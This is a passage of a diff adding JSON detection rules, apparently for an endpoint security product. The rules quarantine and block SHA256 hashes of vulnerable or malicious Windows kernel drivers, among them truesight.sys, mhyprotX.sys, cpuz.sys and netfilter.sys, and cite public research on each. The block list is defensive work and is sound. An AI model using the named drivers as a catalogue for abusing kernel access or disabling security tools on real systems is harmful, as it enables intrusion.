+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54af8a41-e081-5f4e-89fa-d438f89ff61d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142090Z",
+ "creation_date": "2026-03-23T11:45:31.142092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142098Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "185d458f1f9f4777c5fe7c1cc5bbc1a2630fe7251b8b6388525494552fa5e1fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54b01b32-545c-5583-8b27-33360856a8ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980515Z",
+ "creation_date": "2026-03-23T11:45:29.980517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980523Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9d61963c098b07fa7ee6dba40f476fc5d2f16301d79a3e8554319d66c69404a9",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54b492d3-3e5d-50e9-8fbf-29ea3313846e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807850Z",
+ "creation_date": "2026-03-23T11:45:31.807854Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807863Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "228412527401e09d723d5346b33d856986817a4a10fcf30f84d62824b9689252",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54baf95f-00c3-59cf-b1ef-909dc34d6a57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816999Z",
+ "creation_date": "2026-03-23T11:45:30.817002Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c95ebf3f1a87f67d2861dbd1c85dc26c118610af0c9fbf4180428e653ac3e50",
+ "comment": "Vulnerable Kernel Driver (aka SMARTEIO64.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54c7a0f9-b9a3-5728-b609-ae7e8036736c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968385Z",
+ "creation_date": "2026-03-23T11:45:29.968387Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968393Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91b0fdd5bfc596b2f7c9db33e822d24f378c706daf6f92682c5fe1043e547f8d",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54d588e1-f047-595b-b63e-ec2d61cd755c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160812Z",
+ "creation_date": "2026-03-23T11:45:31.160815Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b430c1396d7d6bde1ea75da781c46b7e20ebcb8f8c3056746901cb9682a64ce",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54d8bf0b-bf17-512f-b48f-b32b2f431ab0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457421Z",
+ "creation_date": "2026-03-23T11:45:30.457424Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457433Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6f7897cd08fe9de5e902bb204ff87215584a008f458357d019a50d6139ca4af",
+ "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54df11fe-b1c6-56a2-b50f-ad2baf2adf02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472065Z",
+ "creation_date": "2026-03-23T11:45:30.472069Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "405a99028c99f36ab0f84a1fd810a167b8f0597725e37513d7430617106501f1",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54e1c019-7b80-5cd5-92d1-52172545936d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978101Z",
+ "creation_date": "2026-03-23T11:45:29.978103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978108Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f51bdb0ad924178131c21e39a8ccd191e46b5512b0f2e1cc8486f63e84e5d960",
+ "comment": "Vulnerable Kernel Driver (aka BlackBoneDrv10.sys) [https://www.loldrivers.io/drivers/722772ee-a461-48ec-933d-f3df1578963e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54ef37df-7f39-581d-8407-9fa4a5b6fc1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612163Z",
+ "creation_date": "2026-03-23T11:45:29.612165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612171Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ced17d1ee92ae72749afdfe40f5029223d97f0f977e718bd5ab1242d1ff7cb5",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54f47568-6095-56ae-8307-0806875b29b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151388Z",
+ "creation_date": "2026-03-23T11:45:31.151391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151399Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "073c3c6dcdb4534b061a6378d72dfd92ca78584c93cec37df09c1eaac1d57506",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54f6785f-7f93-568d-9df9-e04453eed8e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808396Z",
+ "creation_date": "2026-03-23T11:45:31.808398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb5f1a8c2dfbd57065f4695958fe22532288ce092a32a867acadd1db3730c49a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "54f76205-0ef5-5c5f-b3ff-e961395117a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614283Z",
+ "creation_date": "2026-03-23T11:45:29.614285Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614290Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f39b84cb5132d4facff213c630b05ec97ef9d83b93579530152310d63945762",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5505f3cc-5c92-5aaa-b79e-a7f2753f3c3c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483012Z",
+ "creation_date": "2026-03-23T11:45:31.483016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483025Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "032fbb9095a8449395e46ffba821eeebaed55a320785319125abccd9611904c8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55377e42-c20c-5085-8ed0-dfdf378e18ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618356Z",
+ "creation_date": "2026-03-23T11:45:29.618358Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618363Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1fbec90c60ee4daba1b35932db9f3556633b2777b1039163841a91cf997938e",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5539433b-070f-5d36-8dc4-cdbf454284ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828293Z",
+ "creation_date": "2026-03-23T11:45:30.828295Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828301Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8cd9ba40871830debe83d134d38cb5a287d59eede0a01eca839f55cf10c558e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "555a0a48-b893-5930-b21a-d41fb24f2639",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477484Z",
+ "creation_date": "2026-03-23T11:45:31.477488Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ffd4812b2a3634efb630521b4c94c643d100e929d5c5e163314a18fb9561bd7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "5564e6bc-0a83-5089-ba3e-a77e6f605048",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491547Z",
+ "creation_date": "2026-03-23T11:45:31.491550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491558Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c60b91241bb1de59b66dea8da67e28acda648876e8fcae986943fd063ce0c57b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "556bde27-78ae-5335-a0e0-7816eb7b044f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967548Z",
+ "creation_date": "2026-03-23T11:45:29.967550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967556Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0afb8b937a5907fbe55a1d1cc7574e9304007ef33fa80ff3896e997a1beaf37",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55791f08-d072-5bbb-825a-89f2f56d19b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621158Z",
+ "creation_date": "2026-03-23T11:45:29.621160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ac22a7cce3795e58c974056a86a06444e831d52185f9f37db88c65e14cd5bb75",
+ "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "557f98c7-d5b1-5880-a8cf-b249060f36ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818119Z",
+ "creation_date": "2026-03-23T11:45:30.818121Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d330ab003206ce5e9828607562790aa8dd0453f6b7452f5c6053e3c6b6761d25",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55974905-e240-5715-be13-75013c1fdd63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158917Z",
+ "creation_date": "2026-03-23T11:45:31.158919Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158924Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e4a40946e097a56b9dc105dc39add411e5ebd1a0593ba04fdfeffc07635f1e0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "55983824-3dd7-58af-9712-8eeb85f43478",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
